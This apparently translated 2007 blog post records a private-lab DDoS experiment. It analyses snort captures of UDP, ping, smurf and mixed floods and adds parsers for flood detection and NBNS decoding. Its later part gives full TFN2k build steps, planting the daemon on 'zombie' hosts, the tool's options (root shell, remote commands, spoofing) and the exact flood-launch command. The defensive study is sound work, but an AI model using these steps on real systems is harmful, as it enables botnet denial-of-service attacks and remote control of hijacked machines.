Category: Network and Security

2007-02-09 14:30:13

22) Packet analysis:

While attacking 10.5.3.61 from the tfn2k server side, I captured the packets with snort and analyzed them as follows:

UDP flood

Packet characteristics:

1) Many different (spoofed) IPs send packets to the same server, from every country imaginable;
2) The packets are very short;
3) Type: type:0x800
4) IpLen:20, completely uniform
5) DgmLen:29, completely uniform
6) The TTL keeps changing, and most values are not 32, 64 or 128
7) No ack/win information
8) Samples of the captured packets follow:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 17 bytes smaller than captured length.
(ip.len: 29, cap.len: 46)
08/10-13:28:56.271396 200.14.100.0:18548 -> 10.5.3.61:46988
UDP TTL:250 TOS:0x0 ID:47561 IpLen:20 DgmLen:29
Len: 1
00 .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 17 bytes smaller than captured length.
(ip.len: 29, cap.len: 46)
08/10-13:28:56.271414 170.105.35.0:8488 -> 10.5.3.61:57048
UDP TTL:219 TOS:0x0 ID:36174 IpLen:20 DgmLen:29
Len: 1
00 .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 17 bytes smaller than captured length.
(ip.len: 29, cap.len: 46)
08/10-13:28:56.271431 62.221.51.0:8487 -> 10.5.3.61:57049
UDP TTL:239 TOS:0x0 ID:17909 IpLen:20 DgmLen:29
Len: 1
00 .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


ICMP/ping flood:

Packet characteristics:

1) Many different (spoofed) IPs send packets to the same server, from every country imaginable;
2) The packets are very short;
3) Type: type:0x800
4) IpLen:20, completely uniform
5) DgmLen:40, completely uniform
6) The TTL keeps changing, and most values are not 32, 64 or 128
7) No ack information and no win information;
8) Packet samples follow:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-12:47:32.874702 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C
234.50.102.0:0 -> 10.5.3.61:0 TCP TTL:245 TOS:0x0 ID:50973 IpLen:20 DgmLen:40
6A 0A 59 FC 00 4A A0 5F DE DD 00 00 00 22 47 AD j.Y..J._....."G.
F6 C7 17 40 ...@

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-12:47:32.878999 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C
254.16.58.0:0 -> 10.5.3.61:0 TCP TTL:238 TOS:0x0 ID:42459 IpLen:20 DgmLen:40
4A FC 94 7D 00 72 17 AB 4A 16 00 00 00 22 20 8C J..}.r..J...." .
64 5E 13 10 d^..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-12:47:32.880967 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C
215.14.60.0:0 -> 10.5.3.61:0 TCP TTL:233 TOS:0x0 ID:64864 IpLen:20 DgmLen:40
E8 81 8E A3 00 5A 10 33 73 62 00 00 00 22 62 11 .....Z.3sb..."b.
5E 2E F0 CF ^...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-12:47:32.881591 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C
91.221.178.0:0 -> 10.5.3.61:0 TCP TTL:245 TOS:0x0 ID:27528 IpLen:20 DgmLen:40
ED E3 9B 23 00 27 9E 63 E2 B3 00 00 00 22 3B A8 ...#.'.c.....";.
69 EC 87 53 i..S

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-12:47:32.882127 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C
102.17.176.0:0 -> 10.5.3.61:0 TCP TTL:204 TOS:0x0 ID:12197 IpLen:20 DgmLen:40
CE 3C A2 34 00 7C E2 D0 D1 F3 00 00 00 22 C9 68 .<.4.|.......".h
C4 E9 DF D8 ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+



ICMP/smurf flood

Packet characteristics:

1) Many different (spoofed) IPs send packets to the same server, from every country imaginable;
2) The packets are very short;
3) Type: type:0x800
4) IpLen:20, completely uniform
5) DgmLen:40, completely uniform
6) The TTL keeps changing, and most values are not 32, 64 or 128
7) No ack information and no win information, but the attacked host sends replies back to the spoofed IPs

The replies contain:

Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
ORIGINAL DATAGRAM DUMP

8) Packet samples follow:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:30:59.386406 74.34.80.0:0 -> 10.5.3.61:0
TCP TTL:252 TOS:0x0 ID:28966 IpLen:20 DgmLen:40
F7 FF BF 1F 00 00 DF F9 57 C1 00 00 00 22 8A EF ........W...."..
10 C5 13 BC ....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:30:59.386425 10.5.3.61 -> 74.34.80.0
ICMP TTL:255 TOS:0xC0 ID:25670 IpLen:20 DgmLen:68
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
74.34.80.0:63487 -> 10.5.3.61:48927
TCP TTL:252 TOS:0x0 ID:28966 IpLen:20 DgmLen:40
**U***S* Seq: 0xDFF9 Ack: 0x57C10000 Win: 0x8AEF TcpLen: 0
** END OF DUMP
00 00 00 00 45 00 00 28 71 26 00 00 FC 06 A6 45 ....E..(q&.....E
4A 22 50 00 0A 05 03 3D F7 FF BF 1F 00 00 DF F9 J"P....=........
57 C1 00 00 00 22 8A EF 10 C5 13 BC W...."......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:30:59.386431 79.18.229.0:0 -> 10.5.3.61:0
TCP TTL:212 TOS:0x0 ID:22910 IpLen:20 DgmLen:40
45 D5 37 43 00 16 79 95 AE CA 00 00 00 22 4E 6B E.7C..y......"Nk
80 24 CF E4 .$..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:30:59.386450 10.5.3.61 -> 79.18.229.0
ICMP TTL:255 TOS:0xC0 ID:47289 IpLen:20 DgmLen:68
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
79.18.229.0:17877 -> 10.5.3.61:14147
TCP TTL:212 TOS:0x0 ID:22910 IpLen:20 DgmLen:40
**U***S* Seq: 0x167995 Ack: 0xAECA0000 Win: 0x4E6B TcpLen: 0
** END OF DUMP
00 00 00 00 45 00 00 28 59 7E 00 00 D4 06 4B FD ....E..(Y~....K.
4F 12 E5 00 0A 05 03 3D 45 D5 37 43 00 16 79 95 O......=E.7C..y.
AE CA 00 00 00 22 4E 6B 80 24 CF E4 ....."Nk.$..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+


MIX flood (UDP/TCP/ICMP)

Packet characteristics:

1) Many different (spoofed) IPs send packets to the same server, from every country imaginable;
2) The packets are very short;
3) Type: type:0x800
4) IpLen:20, completely uniform
5) DgmLen:40, completely uniform
6) The TTL keeps changing, and most values are not 32, 64 or 128
7) The different attacks are mixed together, but the characteristics of each kind of attack packet can still be seen
8) Samples of the mixed attack:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 17 bytes smaller than captured length.
(ip.len: 29, cap.len: 46)
08/10-14:47:16.467838 233.55.241.0:43266 -> 10.5.3.61:22270
UDP TTL:251 TOS:0x0 ID:32450 IpLen:20 DgmLen:29
Len: 1
00 .

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

// Clearly the first one is a UDP attack packet

IP Len field is 10 bytes bigger than captured length.
(ip.len: 92, cap.len: 82)
08/10-14:47:16.467956 80.20.134.0 -> 10.5.3.61
ICMP TTL:0 TOS:0x0 ID:14790 IpLen:20 DgmLen:92
Type:8 Code:0 ID:0 Seq:0 ECHO
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 ......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

// The second is an ICMP attack packet

IP Len field is 10 bytes bigger than captured length.
(ip.len: 92, cap.len: 82)
08/10-14:47:16.467979 10.5.3.61 -> 80.20.134.0
ICMP TTL:64 TOS:0x0 ID:29580 IpLen:20 DgmLen:92
Type:0 Code:0 ID:0 Seq:0 ECHO REPLY
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 ......

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

// The third is a normal packet: the ICMP reply that the server 10.5.3.61 sends back to the spoofed IP range

IP Len field is 6 bytes smaller than captured length.
(ip.len: 40, cap.len: 46)
TCP Data Offset (0) < hlen (0)
08/10-14:47:16.468008 192.27.108.0:0 -> 10.5.3.61:0
TCP TTL:231 TOS:0x0 ID:49300 IpLen:20 DgmLen:40
39 0A 84 E1 00 D0 09 8C F0 78 00 00 00 22 9E D4 9........x..."..
BB 33 BF 1A .3..

// The fourth is an ICMP/smurf attack packet

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:47:16.468029 10.5.3.61 -> 192.27.108.0
ICMP TTL:255 TOS:0xC0 ID:33351 IpLen:20 DgmLen:68
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
192.27.108.0:14602 -> 10.5.3.61:34017
TCP TTL:231 TOS:0x0 ID:49300 IpLen:20 DgmLen:40
**U***S* Seq: 0xD0098C Ack: 0xF0780000 Win: 0x9ED4 TcpLen: 0
** END OF DUMP
00 00 00 00 45 00 00 28 C0 94 00 00 E7 06 D9 DD ....E..(........
C0 1B 6C 00 0A 05 03 3D 39 0A 84 E1 00 D0 09 8C ..l....=9.......
F0 78 00 00 00 22 9E D4 BB 33 BF 1A .x..."...3..

// Clearly this is the server replying to the spoofed IP of the smurf attack

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 17 bytes smaller than captured length.
(ip.len: 29, cap.len: 46)
08/10-14:47:16.468046 170.37.177.0:59132 -> 10.5.3.61:6404
UDP TTL:232 TOS:0x0 ID:42952 IpLen:20 DgmLen:29
Len: 1
00 .

// Another UDP attack packet

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:47:16.468065 10.5.1.1 -> 10.5.3.61
ICMP TTL:63 TOS:0x0 ID:3040 IpLen:20 DgmLen:56
Type:3 Code:1 DESTINATION UNREACHABLE: HOST UNREACHABLE
** ORIGINAL DATAGRAM DUMP:
10.5.3.61 -> 144.148.52.0
ICMP TTL:63 TOS:0x0 ID:8935 IpLen:20 DgmLen:92
** END OF DUMP
00 00 00 00 45 00 00 5C 22 E7 00 00 3F 01 86 E4 ....E..\"...?...
0A 05 03 3D 90 94 34 00 00 00 FF FF 00 00 00 00 ...=..4.........

// This is a normal packet: the gateway 10.5.1.1 telling the attacked server that the reply it sent to the 144.148.52.0 range is unreachable. Of course it is unreachable, the address was spoofed, heh!!

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 6 bytes smaller than captured length.
(ip.len: 40, cap.len: 46)
TCP Data Offset (0) < hlen (0)
08/10-14:47:16.468070 176.86.184.0:0 -> 10.5.3.61:0
TCP TTL:216 TOS:0x0 ID:43343 IpLen:20 DgmLen:40
67 9D 78 37 00 E8 F3 57 00 79 00 00 00 22 8C 50 g.x7...W.y...".P
B5 0B A6 03 ....

// Another ICMP/SMURF attack packet

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-14:47:16.468089 10.5.3.61 -> 176.86.184.0
ICMP TTL:255 TOS:0xC0 ID:45684 IpLen:20 DgmLen:68
Type:3 Code:10 DESTINATION UNREACHABLE: ADMINISTRATIVELY PROHIBITED HOST FILTERED
** ORIGINAL DATAGRAM DUMP:
176.86.184.0:26525 -> 10.5.3.61:30775
TCP TTL:216 TOS:0x0 ID:43343 IpLen:20 DgmLen:40
**U***S* Seq: 0xE8F357 Ack: 0x790000 Win: 0x8C50 TcpLen: 0
** END OF DUMP
00 00 00 00 45 00 00 28 A9 4F 00 00 D8 06 C3 E7 ....E..(.O......
B0 56 B8 00 0A 05 03 3D 67 9D 78 37 00 E8 F3 57 .V.....=g.x7...W
00 79 00 00 00 22 8C 50 B5 0B A6 03 .y...".P....

// The server's smurf reply to the spoofed range

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

IP Len field is 10 bytes bigger than captured length.
(ip.len: 92, cap.len: 82)
08/10-14:47:16.468104 9.93.55.0 -> 10.5.3.61
ICMP TTL:0 TOS:0x0 ID:7240 IpLen:20 DgmLen:92
Type:8 Code:0 ID:0 Seq:0 ECHO
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 ......

// ICMP/flood attack packet

....the rest omitted, heh
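Added example (my own code, not from the original post, snort or tfn2k): a small parser for the "=+=+"-separated snort records shown above that aggregates the heuristics from the feature lists (many distinct sources to one target, tiny datagrams, TTLs outside the usual OS defaults, port 0, several protocols at once). The sample log is constructed from records on this page, including the link-layer form snort prints with -e; the function and field names are my own.

```python
import re
from collections import Counter

# Constructed sample: records copied from the snort captures on this page,
# including the link-layer header form snort prints when run with -e.
SAMPLE_LOG = """\
08/10-13:28:56.271396 200.14.100.0:18548 -> 10.5.3.61:46988
UDP TTL:250 TOS:0x0 ID:47561 IpLen:20 DgmLen:29
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/10-13:28:56.271414 170.105.35.0:8488 -> 10.5.3.61:57048
UDP TTL:219 TOS:0x0 ID:36174 IpLen:20 DgmLen:29
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/10-12:47:32.874702 0:C:29:A3:44:A7 -> 0:13:72:78:9D:27 type:0x800 len:0x3C
234.50.102.0:0 -> 10.5.3.61:0 TCP TTL:245 TOS:0x0 ID:50973 IpLen:20 DgmLen:40
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/10-14:47:16.467956 80.20.134.0 -> 10.5.3.61
ICMP TTL:0 TOS:0x0 ID:14790 IpLen:20 DgmLen:92
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
08/10-14:47:16.467979 10.5.3.61 -> 80.20.134.0
ICMP TTL:64 TOS:0x0 ID:29580 IpLen:20 DgmLen:92
"""

IP_PAIR = re.compile(r"(\d+\.\d+\.\d+\.\d+)(?::(\d+))? -> (\d+\.\d+\.\d+\.\d+)(?::(\d+))?")
PROTO = re.compile(r"\b(UDP|TCP|ICMP) TTL:(\d+) TOS:\S+ ID:\d+ IpLen:(\d+) DgmLen:(\d+)")
DEFAULT_TTLS = {32, 64, 128}  # the post's rule of thumb; hop decrement makes it noisy per packet

def parse_snort_log(text):
    """Yield one record per '=+=+'-separated snort block; skip blocks without an IP header."""
    for chunk in re.split(r"^=\+=.*$", text, flags=re.M):
        ips, proto = IP_PAIR.search(chunk), PROTO.search(chunk)
        if not (ips and proto):
            continue
        yield {"src": ips.group(1), "sport": ips.group(2),
               "dst": ips.group(3), "dport": ips.group(4),
               "proto": proto.group(1), "ttl": int(proto.group(2)),
               "dgmlen": int(proto.group(4))}

def flood_indicators(records, target, max_len=40):
    """Aggregate the post's heuristics over packets addressed to `target`."""
    inbound = [r for r in records if r["dst"] == target]
    ttls = Counter(r["ttl"] for r in inbound)
    return {
        "inbound": len(inbound),
        "distinct_sources": len({r["src"] for r in inbound}),  # spoofing: ~1 source per packet
        "tiny_datagrams": sum(r["dgmlen"] <= max_len for r in inbound),
        "odd_ttls": sum(n for t, n in ttls.items() if t not in DEFAULT_TTLS),
        "port_zero": sum(r["sport"] == "0" or r["dport"] == "0" for r in inbound),
        "protocols": sorted({r["proto"] for r in inbound}),
    }
```

Because every source address is spoofed, per-source blocking or rate limiting is useless against this traffic; the aggregate picture (distinct_sources close to inbound, uniform tiny lengths, port 0) is the signal to alert on.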


This time there was also an unexpected find:

Windows port 137 (NETBIOS Name Service): the packets are very regular, with identical content; samples follow:

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-13:02:40.979178 10.5.3.104:137 -> 10.5.3.255:137
UDP TTL:128 TOS:0x0 ID:57912 IpLen:20 DgmLen:78
Len: 50
92 63 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 .c.......... EME
4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 JFGEFEEEPEPFCCND
47 45 43 45 43 45 43 44 48 44 45 43 41 00 00 20 GECECECDHDECA..
00 01 ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-13:02:41.357057 10.5.3.104:137 -> 10.5.3.255:137
UDP TTL:128 TOS:0x0 ID:57913 IpLen:20 DgmLen:78
Len: 50
92 62 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 .b.......... EME
4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 JFGEFEEEPEPFCCND
47 45 43 45 43 45 43 44 48 44 45 41 41 00 00 20 GECECECDHDEAA..
00 01 ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

08/10-13:02:41.357076 10.5.3.104:137 -> 10.5.3.255:137
UDP TTL:128 TOS:0x0 ID:57914 IpLen:20 DgmLen:78
Len: 50
92 63 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 .c.......... EME
4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 JFGEFEEEPEPFCCND
47 45 43 45 43 45 43 44 48 44 45 43 41 00 00 20 GECECECDHDECA..
00 01 ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
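Added example (my own code, not from the original post): parse the first port-137 sample above as an NBNS query and undo the NetBIOS first-level name encoding (RFC 1001/1002), which turns the "EMEJFG..." label in the dump back into the host name being looked up. The payload bytes are copied from the hex dump above; the function names are my own.

```python
import struct

# Constructed from the first port-137 sample above: the 50-byte UDP payload
# of the broadcast from 10.5.3.104:137 to 10.5.3.255:137.
NBNS_QUERY_HEX = (
    "92 63 01 10 00 01 00 00 00 00 00 00 20 45 4D 45 "
    "4A 46 47 45 46 45 45 45 50 45 50 46 43 43 4E 44 "
    "47 45 43 45 43 45 43 44 48 44 45 43 41 00 00 20 "
    "00 01"
)

def decode_first_level(encoded):
    """Undo NetBIOS first-level encoding (RFC 1001 14.1): each nibble is sent as 'A'+nibble."""
    if len(encoded) != 32 or any(not "A" <= c <= "P" for c in encoded):
        raise ValueError("malformed first-level encoded name")
    nibbles = [ord(c) - ord("A") for c in encoded]
    return bytes((hi << 4) | lo for hi, lo in zip(nibbles[0::2], nibbles[1::2]))

def parse_nbns(payload):
    """Parse the NBNS header and first question (RFC 1002 4.2.1.1 / 4.2.1.2)."""
    if len(payload) < 12:
        raise ValueError("truncated NBNS header")
    tid, flags, qdcount, _an, _ns, _ar = struct.unpack("!6H", payload[:12])
    pos, labels = 12, []
    while True:                      # DNS-style labels, terminated by a zero length byte
        if pos >= len(payload):
            raise ValueError("truncated question name")
        n, pos = payload[pos], pos + 1
        if n == 0:
            break
        labels.append(payload[pos:pos + n].decode("ascii"))
        pos += n
    if not labels or len(payload) < pos + 4:
        raise ValueError("truncated question")
    qtype, qclass = struct.unpack("!HH", payload[pos:pos + 4])
    raw = decode_first_level(labels[0])  # 15 name bytes + 1 suffix byte
    return {
        "transaction_id": tid,
        "opcode": (flags >> 11) & 0x0F,  # 0 = query, 5 = registration, 6 = release
        "recursion_desired": bool(flags & 0x0100),
        "broadcast": bool(flags & 0x0010),
        "qdcount": qdcount,
        "name": raw[:15].rstrip(b" ").decode("ascii"),
        "suffix": raw[15],               # 0x00 workstation, 0x20 file server service
        "scope": ".".join(labels[1:]),   # empty here: no NetBIOS scope ID
        "qtype": qtype,                  # 0x0020 = NB (name query)
        "qclass": qclass,                # 0x0001 = IN
    }
```

For the first sample this yields the name LIVEDOOR-6BBB74 with suffix 0x20; the second sample differs only in its last label characters (AA instead of CA), which is the suffix byte 0x00, so the "identical" packets are two queries for the same host with different service suffixes.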




Attack and defense process:

Capture packets during the attack with tcpdump:
tcpdump -w /tmp/tcpdump.log

Read back the packets recorded during the attack with tcpdump:
tcpdump -r /tmp/tcpdump.log

Analyze the packets with snort:
snort -r /tmp/tcpdump.log

Determine the attack type by comparing against the packet characteristics obtained in the experiments
(see the MIX flood analysis above)

Apply the countermeasures for that attack to protect the server
In progress....



--------------------------------------------------------------------------

After all the attacks described above, UDP flood/ICMP/ping flood/ICMP SMURF flood/MIX (UDP/ICMP/SMURF flood),
who is the culprit behind the scenes? Now let me talk about the famous tfn2k.



Introduction:

  TFN2k is considered the most powerful and best-performing DoS attack tool around today, and it is almost impossible to detect. What was the author's purpose in releasing this tool? The author assures you that it will not harm companies or individuals, but it will scare those who do not care about system security, because sophisticated tools are constantly being improved and held privately, and many of them are unpredictable. Now is the time for everyone to wake up; everyone should realize that if they do not pay enough attention to their security, the worst will happen.
  For that reason the program was designed to compile on most operating systems, to show that no current operating system is particularly secure, including Windows, Solaris, Linux and various other Unixes.


Features:

  TFN uses distributed client/server functionality, encryption and other techniques; it can be used to control any number of remote machines to generate random, anonymous denial-of-service attacks and remote access.

New features in this version include:

1. Functional additions:
   remote one-way command execution for distributed execution control
   mixed attacks against weak routers
   Targa3 attacks against systems with IP stack weaknesses
   compatibility with many Unix systems and WinNT.
2. Anonymous, covert client/server communication using:
   spoofed source addresses
   strong encryption
   a one-way communication protocol
   messages sent over random IP protocols
   decoy packets


Compiling and installing:

Download the tfn2k package: fetch http://www.xfocus.net/tools/200405/tfn2k.tgz

Unpack it:
tar zxvf tfn2k.tgz

I am using Linux AS4, so the ip.h file needs a change:
vi /usr/local/src/tfn2k/src/ip.h

cd /usr/local/src/
ls
wget http://www.xfocus.net/tools/200405/tfn2k.tgz
ls
tar zxvf tfn2k.tgz
cd tfn2k/src/
make
vi ip.h

Comment out this definition:

/*
struct in_addr
{
unsigned long int s_addr;
};*/

make clean
make
ls
chmod 755 ./td
chmod 755 ./tfn


OK, a successful build produces more than two files; we only use two of them, tfn and td:

td is uploaded to the "zombie" (compromised host) and run:
./td
Once it is running, the zombie takes your orders, heh.

My environment:

4 Red Hat AS4 servers
1 FreeBSD 6.1 server

Of these: two simulated zombies, one command host (the attacker's controller) and one target host are all AS4, and one IDS server is FreeBSD.

Zombies:
10.5.3.147/24
10.5.3.148/24
td has been uploaded and is running;

Command host:
10.5.3.96/24
tfn2k compiled successfully

Target server, provided by Lao Mi:
10.5.3.61/24

Thanks to Lao Mi for the hard work of capturing the attack packets with tcpdump.

On FreeBSD, snort 2.6.0 + acid 0.963c have been installed as described above; the monitoring data is being received, and my rules were obtained by download.


Attack experiment:

Run on the command host:

usage: ./tfn
[-P protocol] Protocol for server communication. Can be ICMP, UDP or TCP.
Uses a random protocol as default
[-D n] Send out n bogus requests for each real one to decoy targets
[-S host/ip] Specify your source IP. Randomly spoofed by default, you need
to use your real IP if you are behind spoof-filtering routers
[-f hostlist] Filename containing a list of hosts with TFN servers to contact
[-h hostname] To contact only a single host running a TFN server
[-i target string] Contains options/targets separated by '@', see below
[-p port] A TCP destination port can be specified for SYN floods
<-c command ID> 0 - Halt all current floods on server(s) immediately
1 - Change IP antispoof-level (evade rfc2267 filtering)
usage: -i 0 (fully spoofed) to -i 3 (/24 host bytes spoofed)
2 - Change Packet size, usage: -i
3 - Bind root shell to a port, usage: -i
4 - UDP flood, usage: -i victim@victim2@victim3@...
5 - TCP/SYN flood, usage: -i victim@... [-p destination port]
6 - ICMP/PING flood, usage: -i victim@...
7 - ICMP/SMURF flood, usage: -i victim@broadcast@broadcast2@...
8 - MIX flood (UDP/TCP/ICMP interchanged), usage: -i victim@...
9 - TARGA3 flood (IP stack penetration), usage: -i victim@...
10 - Blindly execute remote shell command, usage -i command


OK, there are quite a few attacks available:

On .96, run:

vi ./host.txt
10.5.3.147
10.5.3.148
save

[root@localhost src]# ./tfn -f host.txt -c 4 -i 10.5.3.61

Protocol : random
Source IP : random
Client input : list
Command : commence udp flood

Password verification:
Enter the password you set when compiling tfn2k
Sending out packets: ...

If the password is correct, the command host .96 directs .147 and .148 to attack .61.

Within a few minutes .61 was struggling, CPU at 100% and load climbing steadily, but it did not go down; after all this is a distributed attack and two machines are too few, so get a few more servers...

OK, this was only an experiment...


